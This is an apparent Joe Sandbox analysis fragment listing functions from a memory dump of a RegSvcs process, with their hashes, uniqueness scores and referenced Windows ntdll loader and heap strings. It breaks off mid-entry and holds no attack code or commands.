Opcode ID: 54793da9c292af87ece12213c5224253bb866c1824707cef51fc4dcf595e94a6
Instruction ID: a027407fd7b1477ffc9d3b693637f4a5b9dc9d893decf6f7a4a18279c04e6da5
Opcode Fuzzy Hash: 54793da9c292af87ece12213c5224253bb866c1824707cef51fc4dcf595e94a6
Instruction Fuzzy Hash: 7E416F72E0020AABDF15DAD8CC91FEEBBB9AB54704F54806AE609F7280D7749E458F50

Uniqueness

Uniqueness Score: -1.00%

Function 01684144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON

Download Yara Rule

Strings

LdrpResValidateFilePath Enter, xrefs: 01684160
@, xrefs: 01684225
LdrpResValidateFilePath Exit, xrefs: 01684172

Memory Dump Source

Source File: 00000006.00000002.1705460907.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_15c0000_RegSvcs.jbxd

Similarity

API ID:
String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
API String ID: 0-1373925480
Opcode ID: ce3e88351cd54ae8a9c08c7c2f05e1fddfa26ee4da8489636452ff926eb32f85
Instruction ID: 11fcf8f56fbe260f4636caaf1d61a4c6065b96a68d9a84dad2759d516248ada7
Opcode Fuzzy Hash: ce3e88351cd54ae8a9c08c7c2f05e1fddfa26ee4da8489636452ff926eb32f85
Instruction Fuzzy Hash: 59411332A0464A8FEB26EBA9CC50BADBBB5FF65340F14065ED941EB781DB358901CB10

Uniqueness

Uniqueness Score: -1.00%

Function 01674755 Relevance: 3.9, Strings: 3, Instructions: 121COMMON

Download Yara Rule

Strings

LdrpCheckRedirection, xrefs: 0167488F
minkernel\ntdll\ldrredirect.c, xrefs: 01674899
Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01674888

Memory Dump Source

Source File: 00000006.00000002.1705460907.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_15c0000_RegSvcs.jbxd

Similarity

API ID:
String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
API String ID: 0-3154609507
Opcode ID: dcf302c0498fdbc1687c5a77a60e4a9905469c29585bde9219e84229ced3033b
Instruction ID: c0f4ea6a8c09fddca7087635a73344206452112ba468892e5358cb05183a7c79
Opcode Fuzzy Hash: dcf302c0498fdbc1687c5a77a60e4a9905469c29585bde9219e84229ced3033b
Instruction Fuzzy Hash: EB41D132A04655DFCB21CE6CDC48A26BBE9BF89A90F06066DED59DB351DB30D810CB91

Uniqueness

Uniqueness Score: -1.00%

Function 01600BBE Relevance: 3.8, Strings: 3, Instructions: 70COMMON

Download Yara Rule

Strings

(ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size), xrefs: 01655449
HEAP[%wZ]: , xrefs: 01655431
HEAP: , xrefs: 0165543E

Memory Dump Source

Source File: 00000006.00000002.1705460907.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_15c0000_RegSvcs.jbxd

Similarity

API ID:
String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
API String ID: 0-2558761708
Opcode ID: ca1310ab086455e2241a4e375798ab17fd56783bd047b282a3d8759b43b24f2a
Instruction ID: b72e4d701fbe83518744e4689eaf0358fc757917fcd56506f8dcab25748181bc
Opcode Fuzzy Hash: ca1310ab086455e2241a4e375798ab17fd56783bd047b282a3d8759b43b24f2a
Instruction Fuzzy Hash: 8811DF313565429FDB6EDA18CC48B76BBA5EF40B16F18811EF806CF292EB30E842C755

Uniqueness

Uniqueness Score: -1.00%

Function 016720DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON

Download Yara Rule

Strings

Process initialization failed with status 0x%08lx, xrefs: 016720F3
LdrpInitializationFailure, xrefs: 016720FA
minkernel\ntdll\ldrinit.c, xrefs: 01672104

Memory Dump Source

Source File: 00000006.00000002.1705460907.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_15c0000_RegSvcs.jbxd

Similarity

API ID:
String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
API String ID: 0-2986994758
Opcode ID: 5da906bc51c34c14bbf825706aa7c1fda123acab0aca17a26efaf089b140410f
Instruction ID: 7dc33281124c6bbbf4586b8907e9fac700605b27a558b748dd933ae107a970b6
Opcode Fuzzy Hash: 5da906bc51c34c14bbf825706aa7c1fda123acab0aca17a26efaf089b140410f
Instruction Fuzzy Hash: 8FF0C279680308ABEB34EA4DEC63FA977A9FB41B54F10005DFB006F781D6B0A950CB95

Uniqueness

Uniqueness Score: -1.00%

Function 016003E9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 184COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 01654D8A

Strings

#%u, xrefs: 01654D82

Memory Dump Source

Source File: 00000006.00000002.1705460907.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_15c0000_RegSvcs.jbxd

Similarity

API ID: ___swprintf_l
String ID: #%u
API String ID: 48624451-232158463
Opcode ID: 4142049863410c43acb3c667dde8d9ba0bcee13fa0864af81775e2b6ce04bfe7
Instruction ID: 24430363d41f947340a94cbe599ef8a173ca761bdc25d20491e3246a9eaf72e4
Opcode Fuzzy Hash: 4142049863410c43acb3c667dde8d9ba0bcee13fa0864af81775e2b6ce04bfe7
Instruction Fuzzy Hash: 7A715672A0014A9FDB06DFA8CD80BAEB7F9BF58344F150069E901A7391EB34ED41CB64

Uniqueness

Uniqueness Score: -1.00%

Function 015FA9D0 Relevance: 2.9, Strings: 2, Instructions: 421COMMON

Download Yara Rule

Strings

LdrResSearchResource Exit, xrefs: 015FAA25
LdrResSearchResource Enter, xrefs: 015FAA13

Memory Dump Source

Source File: 00000006.00000002.1705460907.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_15c0000_RegSvcs.jbxd

Similarity

API ID:
String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
API String ID: 0-4066393604
Opcode ID: 5663ef37e272c71dde448e8aacdd2aa0eae15effc3b801a3e28c48257778b1b3
Instruction ID: b34eaca32bb839f811def0d042a60d5d00e0caf2fdae0fff2d6fe6d08d661c00
Opcode Fuzzy Hash: 5663ef37e272c71dde448e8aacdd2aa0eae15effc3b801a3e28c48257778b1b3
Instruction Fuzzy Hash: 03E18E71A00209AFEB22CE99CD80BAEBBBABF44750F10452EEE05EB351D7749945CB51

Uniqueness

Uniqueness Score: -1.00%

Function 016BA352 Relevance: 2.8, Strings: 2, Instructions: 348COMMON

Download Yara Rule

Strings

`, xrefs: 016BA551
`, xrefs: 016BA44B

Memory Dump Source

Source File: 00000006.00000002.1705460907.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_15c0000_RegSvcs.jbxd

Similarity

API ID:
String ID: `$`
API String ID: 0-197956300
Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
Instruction ID: 223c0145924da40529989fc74f6a9389b416e54d51fe127406c21eb72fc555b4
Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
Instruction Fuzzy Hash: F2C1E2712043429BE725CF68CC80BABBBE6AFC4314F084A2DF696CB291D775D585CB45

Uniqueness

Uniqueness Score: -1.00%

Function 0166E6F2 Relevance: 2.7, Strings: 2, Instructions: 179COMMON

Download Yara Rule

Strings

Legacy, xrefs: 0166E75A
UEFI, xrefs: 0166E751

Memory Dump Source

Source File: 00000006.00000002.1705460907.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_15c0000_RegSvcs.jbxd

Similarity

API ID: InitializeThunk
String ID: Legacy$UEFI
API String ID: 2994545307-634100481
Opcode ID: bf02cfbe1d664179a62e9093729f991af733c68aaf48074f5d15f5b3a447bf14
Instruction ID: 79746843e243ae9d1d97ea43dda07cf307b1ad1a781185d6497ad7e80edcd343
Opcode Fuzzy Hash: bf02cfbe1d664179a62e9093729f991af733c68aaf48074f5d15f5b3a447bf14
Instruction Fuzzy Hash: 61616D75E007199FDB24DFA8CC80BAEBBB9FB44700F15406EE649EB291D732A901CB50

Uniqueness

Uniqueness Score: -1.00%

Function 016943D4 Relevance: 2.7, Strings: 2, Instructions: 169COMMON

Download Yara Rule

Strings

@, xrefs: 01694437
MUI, xrefs: 01694525

Memory Dump Source

Source File: 00000006.00000002.1705460907.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_15c0000_RegSvcs.jbxd

Similarity

API ID:
String ID: @$MUI
API String ID: 0-17815947
Opcode ID: 37fc7f27ad829ab62ed3655bce2a10d28dc07ea495b2885e3a47028a23f178eb
Instruction ID: 5a76bfd7c9bebe93f52ab3fb3f6ef9fd998bc116277df172242d046debc0b428
Opcode Fuzzy Hash: 37fc7f27ad829ab62ed3655bce2a10d28dc07ea495b2885e3a47028a23f178eb
Instruction Fuzzy Hash: 4851F671E0061EAFDF11DFE9CD90AEEBBBDEB44654F100529E611A7290DB349A06CB60

Uniqueness

Uniqueness Score: -1.00%

Function 015F04E5 Relevance: 2.7, Strings: 2, Instructions: 153COMMON

Download Yara Rule

Strings

TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 015F063D
kLsE, xrefs: 015F0540

Memory Dump Source

Source File: 00000006.00000002.1705460907.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_15c0000_RegSvcs.jbxd

Similarity

API ID:
String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
API String ID: 0-2547482624
Opcode ID: c985d1bb44141d1f8f76bd67a20f1f8fa39dcb53f298a2d6c51b405ca6064c91
Instruction ID: 772b015c19c0ee88ba87cea583b4bbfb4f03e25db3062dfcbf07fde1d83b877f
Opcode Fuzzy Hash: c985d1bb44141d1f8f76bd67a20f1f8fa39dcb53f298a2d6c51b405ca6064c91
Instruction Fuzzy Hash: 3C51B1715047428FD724EF68C8446ABB7E6BF85304F18483EF69A8B282E770D545CB92

Uniqueness

Uniqueness Score: -1.00%

Function 015FA2C3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON

Download Yara Rule

Strings

RtlpResUltimateFallbackInfo Enter, xrefs: 015FA2FB
RtlpResUltimateFallbackInfo Exit, xrefs: 015FA309

Memory Dump Source

Source File: 00000006.00000002.1705460907.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_15c0000_RegSvcs.jbxd

Similarity

API ID:
String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
API String ID: 0-2876891731
Opcode ID: 0daf48047f471bcbdae77e9ef6533483ec437cb5bb13e756eb0b01c72a84b51a
Instruction ID: 997cc89c2606fe26cd47bffdc1ff979e9b8cefeb588405d702409f8e4c7723b7
Opcode Fuzzy Hash: 0daf48047f471bcbdae77e9ef6533483ec437cb5bb13e756eb0b01c72a84b51a
Instruction Fuzzy Hash: A941AB35A00645CBDB269F59C850B6E7BB4FF84704F1444ADEA08DF391E7B5D900CB51

Uniqueness

Uniqueness Score: -1.00%

Function 0162A5D0 Relevance: 2.5, Strings: 2, Instructions: 38COMMON

Download Yara Rule

Strings

Threadpool!, xrefs: 0162A5E9
Cleanup Group, xrefs: 0162A5E4

Memory Dump Source

Source File: 00000006.00000002.1705460907.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_15c0000_RegSvcs.jbxd

Similarity

API ID: InitializeThunk
String ID: Cleanup Group$Threadpool!
API String ID: 2994545307-4008356553
Opcode ID: 0bf62c9821b33f59da61a25ab75d80a725ad03160c4c186e5078c72cc3a2154b
Instruction ID: 5cc871619507d6468a9ddce39e6482a770c081c25039bcff82a5ae21a4e39da1
Opcode Fuzzy Hash: 0bf62c9821b33f59da61a25ab75d80a725ad03160c4c186e5078c72cc3a2154b
Instruction Fuzzy Hash: 2901D1B2250B10AFD321DF94CD55B1677E8F794B15F00897DE648CB590E7B4E805CB4A

Uniqueness

Uniqueness Score: -1.00%

Function 015FC7C0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON

Download Yara Rule

Strings

MUI, xrefs: 015FC8C3, 015FCA40

Memory Dump Source

Source File: 00000006.00000002.1705460907.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_15c0000_RegSvcs.jbxd

Similarity

API ID:
String ID: MUI
API String ID: 0-1339004836
Opcode ID: 1f0a2dfc4c102d6822367c791a385cd4c72edb8aefd9492bb1b52ba724da1d66
Instruction ID: 56fb5260bd8f9bf786f59a5ecf7050d8e1e12d6a54c84a8298618347c7788b0e
Opcode Fuzzy Hash: 1f0a2dfc4c102d6822367c791a385cd4c72edb8aefd9492bb1b52ba724da1d66
Instruction Fuzzy Hash: D5824875E002198FEB25CFA9C884BEDBBB5FF48310F14816DEA59AF291D770A941CB50

Uniqueness

Uniqueness Score: -1.00%

Function 01676420 Relevance: 1.5, Strings: 1, Instructions: 264COMMON

Download Yara Rule

Strings

, xrefs: 016765C1

Memory Dump Source

Source File: 00000006.00000002.1705460907.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_15c0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 0e52a011b4823df2dd798299eb560e16e0809182b41ebfe17d62a7dac53b2302
Instruction ID: 0915bbb521429d368317d595df83a8bbe89c750395fd299f910f8218b596b8bd
Opcode Fuzzy Hash: 0e52a011b4823df2dd798299eb560e16e0809182b41ebfe17d62a7dac53b2302
Instruction Fuzzy Hash: A2919571900619AFEB21DF95CC85FAEBBB9EF14B50F140059F601BB294D774AD04CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0169E10E Relevance: 1.5, Strings: 1, Instructions: 255COMMON

Download Yara Rule

Strings

, xrefs: 0169E1FA

Memory Dump Source

Source File: 00000006.00000002.1705460907.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_15c0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: ebf1eb333c4fb1cb3130b2aba061e16ef91d6735b01f122e3a3eaac145f1d33f
Instruction ID: e084c2dfff8afb3efac2b5d2168549276c22ba23b7484a7fe74ef68b0b890430
Opcode Fuzzy Hash: ebf1eb333c4fb1cb3130b2aba061e16ef91d6735b01f122e3a3eaac145f1d33f
Instruction Fuzzy Hash: 1D919F72A00609AFDF26EBA5DC44FAFBB7EEF85750F100029F501A7250DB769902CB94

Uniqueness

Uniqueness Score: -1.00%

Function 0162A660 Relevance: 1.4, Strings: 1, Instructions: 200COMMON

Download Yara Rule

Strings

GlobalTags, xrefs: 016667C9

Memory Dump Source

Source File: 00000006.00000002.1705460907.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_15c0000_RegSvcs.jbxd

Similarity

API ID:
String ID: GlobalTags
API String ID: 0-1106856819
Opcode ID: 91ec62a940f6693fc847f5c43d086f81a68b0f775cc8f4a90f831eb17fb1c8ce
Instruction ID: a4c707072bfcea7a5293fc88f32fe64cda14fcf4e3d5e0cff50f43e543fbe3ed
Opcode Fuzzy Hash: 91ec62a940f6693fc847f5c43d086f81a68b0f775cc8f4a90f831eb17fb1c8ce
Instruction Fuzzy Hash: 26719175E0021ACFDF28CFADE9906ADBBB6BF58700F14812EE506A7341E7749901CB64

Uniqueness

Uniqueness Score: -1.00%

Function 01694978 Relevance: 1.4, Strings: 1, Instructions: 153COMMON

Download Yara Rule

Strings

.mui, xrefs: 01694A7F

Memory Dump Source

Source File: 00000006.00000002.1705460907.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_15c0000_RegSvcs.jbxd

Similarity

API ID:
String ID: .mui
API String ID: 0-1199573805
Opcode ID: 664ae108564ca2b2100c86273d2bb6311a24298ef5f35dd65aae3cc10d9b18cc
Instruction ID: 9ac1a9fbf0ec5e5048c160bd56974a6f4673176e1d01d7720ad08c2396c426c0
Opcode Fuzzy Hash: 664ae108564ca2b2100c86273d2bb6311a24298ef5f35dd65aae3cc10d9b18cc
Instruction Fuzzy Hash: 8A519672D002269BDF10DF99DD40AAEBBB9BF09610F05416DEA11BB354DB385802CBE4

Uniqueness

Uniqueness Score: -1.00%

Function 0160E627 Relevance: 1.4, Strings: 1, Instructions: 148COMMON

Download Yara Rule

Strings

EXT-, xrefs: 0160E6A4

Memory Dump Source

Source File: 00000006.00000002.1705460907.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_15c0000_RegSvcs.jbxd

Similarity

API ID:
String ID: EXT-
API String ID: 0-1948896318
Opcode ID: b8a2a1f9ac32a2c168217fce3229485df53f6c4bdeffc8ee74f2a0b8ad64af89
Instruction ID: 4743fc60ce0607e4a6649049a0cfb53ecddd619b9a0887ec7c04ddd92c29f365
Opcode Fuzzy Hash: b8a2a1f9ac32a2c168217fce3229485df53f6c4bdeffc8ee74f2a0b8ad64af89
Instruction Fuzzy Hash: 8F41A0725083229BD72ADAB9CD40B6BB7E8EF88714F040D2DFA84D7280E775D904C796

Uniqueness

Uniqueness Score: -1.00%

Function 0166C730 Relevance: 1.4, Strings: 1, Instructions: 129COMMON

Download Yara Rule

Strings

BinaryHash, xrefs: 0166C77F

Memory Dump Source

Source File: 00000006.00000002.1705460907.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_15c0000_RegSvcs.jbxd

Similarity

API ID:
String ID: BinaryHash
API String ID: 0-2202222882
Opcode ID: 3576fc1a45c577fa81e6b10691e83c30c96fac0de2ceb56d25869815901298a5
Instruction ID: fe945772233b1848750bdcf751c779dfe749d2bc23e44a975a8d63278e033f23
Opcode Fuzzy Hash: 3576fc1a45c577fa81e6b10691e83c30c96fac0de2ceb56d25869815901298a5
Instruction Fuzzy Hash: DB4143B1D0052DABDB21DA50CC84FDEBB7DAB44714F0145E9EA48AB140DB709E89CFA8

Uniqueness

Uniqueness Score: -1.00%

Function 01686B40 Relevance: 1.4, Strings: 1, Instructions: 106COMMON

Download Yara Rule

Strings

#, xrefs: 01686B91

Memory Dump Source

Source File: 00000006.00000002.1705460907.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_15c0000_RegSvcs.jbxd

Similarity

API ID:
String ID: #
API String ID: 0-1885708031
Opcode ID: 7276fc12f11d7fc55a86c640b6f9dc22695c77aeb9c1c48d081fa2981b1d3b00
Instruction ID: e4ae8dfd49dbc960713902d021ebe8c01d45bf21159d18f1aa4c9cc227e4b982
Opcode Fuzzy Hash: 7276fc12f11d7fc55a86c640b6f9dc22695c77aeb9c1c48d081fa2981b1d3b00
Instruction Fuzzy Hash: F7310731A007199BEB22EF69CC54BEEBBB9EF44704F14426CE941AB382DB75D805CB54

Uniqueness

Uniqueness Score: -1.00%

Function 0166CA72 Relevance: 1.3, Strings: 1, Instructions: 94COMMON

Download Yara Rule

Strings

BinaryName, xrefs: 0166CAA2

Memory Dump Source

Source File: 00000006.00000002.1705460907.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_15c0000_RegSvcs.jbxd

Similarity

API ID:
String ID: BinaryName
API String ID: 0-215506332
Opcode ID: 2260a1c2d9e57673afe3eba5d98def487db9ad1d1b5b8289eca0bb309a375a76
Instruction ID: ef40376ed8dd730a677a7df9c4e81ebbbb94ec0b196a4f4582e4abde208fc080
Opcode Fuzzy Hash: 2260a1c2d9e57673afe3eba5d98def487db9ad1d1b5b8289eca0bb309a375a76
Instruction Fuzzy Hash: 2931F23690091AAFEB16DB59CC55E7FBBB8EF80720F018169E945A7290D7309E04DBE0

Uniqueness

Uniqueness Score: -1.00%

Function 0167892A Relevance: 1.3, Strings: 1, Instructions: 47COMMON

Download Yara Rule

Strings

AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 0167895E

Memory Dump Source

Source File: 00000006.00000002.1705460907.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_15c0000_RegSvcs.jbxd

Similarity

API ID:
String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
API String ID: 0-702105204
Opcode ID: ebf04e80335947afca784e715db8aadc2025616f9a3f8cdc4ca57a62f97882ab
Instruction ID: fc02938d9e40c298be9fe54e045cac946109ae9f676b649c5fbe4cb0aeb48537
Opcode Fuzzy Hash: ebf04e80335947afca784e715db8aadc2025616f9a3f8cdc4ca57a62f97882ab
Instruction Fuzzy Hash: 8001F236611202AFE7246B5E9C8CA5A7BEAFFC13A8B04112DF6420F651CB20AC51C796

Uniqueness

Uniqueness Score: -1.00%

Function 01692000 Relevance: .8, Instructions: 757COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1705460907.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_15c0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d0df1eab248ce20bacf1af4640fd339ce2a03aaed53ec72799553d8347c9577f
Instruction ID: b6018c77f235534474d52b8acffb4ab9a0c4dcd7d4f7941de7961e2219fcfd88
Opcode Fuzzy Hash: d0df1eab248ce20bacf1af4640fd339ce2a03aaed53ec72799553d8347c9577f
Instruction Fuzzy Hash: 0142A371608341ABDF25CF68CDA0A6BBBE9BF84700F09492DFA869B350D771D845CB52

Uniqueness

Uniqueness Score: -1.00%

Function 01688158 Relevance: .6, Instructions: 617COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1705460907.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_15c0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 350d7f785af5d5c631b701daea4f16e5e8caeee46bff37679faad2bf89181432
Instruction ID: 164c5673eff1c6158b2ce29cb609575aaf91dea13ae8f38c09c1a74ae3c93c30
Opcode Fuzzy Hash: 350d7f785af5d5c631b701daea4f16e5e8caeee46bff37679faad2bf89181432
Instruction Fuzzy Hash: C9426C75A002198FEB25DF69CC41BADBBFABF48300F598199E949EB342D7349981CF50

Uniqueness

Uniqueness Score: -1.00%

Function 01602840 Relevance: .6, Instructions: 605COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1705460907.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_15c0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cd9f608de855d74f701ae28ebe826e381e0c543ebe8b8b5695b4bc7b184af75e
Instruction ID: 18d4a13c3214446c5b73439f57f163a0df48cec8efe7fadf9a7052d6367ec707
Opcode Fuzzy Hash: cd9f608de855d74f701ae28ebe826e381e0c543ebe8b8b5695b4bc7b184af75e
Instruction Fuzzy Hash: 8632BC70A007568BEB69CF69CC547BEBBF2BF84304F64811DD9869B385D735A842CB60

Uniqueness

Uniqueness Score: -1.00%

Function 0169A118 Relevance: .6, Instructions: 591COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1705460907.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_15c0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 720e674a1eb2ff03d319dff6c4fb39d30ed9b1f4f4e1c3c2f551b3b2dbbf35e0
Instruction ID: 52728db359b7b6fc8e798b4ac873c0db0f1d123bed41baba9ed99ebeed1e3d21
Opcode Fuzzy Hash: 720e674a1eb2ff03d319dff6c4fb39d30ed9b1f4f4e1c3c2f551b3b2dbbf35e0
Instruction Fuzzy Hash: FB22E0742046618BEF25CFADC894376BBF9AF44304F08859AE986CF386D735E452DB60

Uniqueness

Uniqueness Score: -1.00%

Function 015F6A50 Relevance: .5, Instructions: 548COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1705460907.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_15c0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5174bf279e87986987e1ac3a402e52ee04558afc2d3e10ea6019bb365ba661b1
Instruction ID: b395c29d15d06c28f319b8d409caaf961f964aee8d259280a8e2552467d60354
Opcode Fuzzy Hash: 5174bf279e87986987e1ac3a402e52ee04558afc2d3e10ea6019bb365ba661b1
Instruction Fuzzy Hash: DE326A71A01215CFDB25CF68C890BAABBF2FF48310F14856DEA56AB392D774E841CB50

Uniqueness

Uniqueness Score: -1.00%

Function 01614A35 Relevance: .4, Instructions: 423COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1705460907.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_15c0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
Instruction ID: a6c7718155c50af792c8f803ca908747eda6b5d5e11ad80a4f580d44a343a136
Opcode Fuzzy Hash: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
Instruction Fuzzy Hash: 03F14F71E0021A9BDF15CFA9CD90BAEBBF6BF44710F498169E905AB348EB74D841CB50

Uniqueness

Uniqueness Score: -1.00%

Function 0168892B Relevance: .4, Instructions: 386COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1705460907.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_15c0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f21fd93251369027f0fd6184655fceed8f11b26d6a6ebbb2a5ffd9d0232de37e
Instruction ID: 1e24dc089d74d65095b1598c556d850e54ad5a9957dd6611c2cf33e16e1ce679
Opcode Fuzzy Hash: f21fd93251369027f0fd6184655fceed8f11b26d6a6ebbb2a5ffd9d0232de37e
Instruction Fuzzy Hash: 10D1E271E0060A8BDF15DF98CC41AFEB7FAAF88304F588269D955A7281D735E906CB60

Uniqueness

Uniqueness Score: -1.00%

Function 015F65D0 Relevance: .4, Instructions: 383COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1705460907.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_15c0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ffc9b85d0a973990519a6d1e97bc7984983d23dff6be02ea2d34e969753f979b
Instruction ID: 3ae486af955e80a9241e99171701c1e6b956de7b1760dacc35241cc37163ff26
Opcode Fuzzy Hash: ffc9b85d0a973990519a6d1e97bc7984983d23dff6be02ea2d34e969753f979b
Instruction Fuzzy Hash: 25E1A071609342CFC715CF28C590A6ABBF1FF89304F058A6DEA958B351EB31E905CB92

Uniqueness

Uniqueness Score: -1.00%

Function 015E8397 Relevance: .4, Instructions: 380COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1705460907.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_15c0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 133bade6fa31e8340afee55610e3282f69a8f9bc7bf2465ca952b529dcddce91
Instruction ID: 3a9e1974b64da535e6bcd8460eb4e6496106ae22d77ab46d33d72be315556188
Opcode Fuzzy Hash: 133bade6fa31e8340afee55610e3282f69a8f9bc7bf2465ca952b529dcddce91
